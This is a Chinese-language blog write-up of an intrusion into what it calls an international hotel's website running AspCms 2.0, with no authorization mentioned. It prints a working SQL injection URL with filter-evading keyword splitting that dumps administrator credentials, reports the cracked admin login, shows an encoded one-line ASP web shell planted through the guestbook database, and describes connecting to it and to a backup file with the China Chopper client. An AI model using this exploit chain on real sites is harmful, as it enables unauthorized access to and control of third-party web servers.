这是某个国际酒店的网站,由于使用了AspCms 2.0,通过SQL注入我们很快可以拿下shell
此次测试中,由于网站限制了所有的读写权限,由各种错误,以及最后的小马根本没什么权限。
0x01 基础信息:
简单看看指纹信息:
是ASPCMS的,通过一个通用SQL注入拿到管理员的账号密码:
EXP:
https://blog.dyboy.cn/plug/comment
/commentList.asp?id=0%20unmasterion%20
semasterlect%20top%201%20UserID,GroupID,
LoginName,Password,now%28%29,null,1%20%20
frmasterom%20%7bprefix%7duser
利用EXP直接获得:
解密得到管理员
账号:admin
密码:123456
0x02 深入测试:
后台默认为: https://blog.dyboy.cn/admin_aspcms/
登陆管理后台
根据以前的添加模版的方法不可行,再多看几下,发现整个网站是没有写入权限的...
这里要提一个东西就是aspcms默认的留言板数据库路径:
https://blog.dyboy.cn/data/data.asp
有的我们在留言板留言一句话
┼攠數畣整爠煥敵瑳∨≡┩愾
密码:a
菜刀连接 https://blog.dyboy.cn/data/data.asp 即可
因为整个网站都没有写的权限,应该这个网站之前就有被入侵的经历吧,所以做了限制,找到备份文件的地方,尝试了一下,虽然显示成功备份,事实上不能备份。
因为不能直接下载备份文件,就直接访问备份文件,发现一个有趣的东西:
有一个 execute 语句,大家应该有所想法的
然后死马当活马医,直接菜刀链接备份数据库文件,猜测密码为a,因为数据库文件比较大,所以每次的操作都会消耗较长的时间
然后就这么就连上了...
前面也说了整个网站都没权限,鸡肋shell一个。
0x03 总结:
shell是否有权限不重要,aspcms的都可以这么黑盒测试
提供一下这个 ASPcms 2.0 的源码下载地址:
http://down.admin5.com/asp/73162.html
空闲有能力的朋友可以审计一下,ASP的我就会一句话[捂脸]...
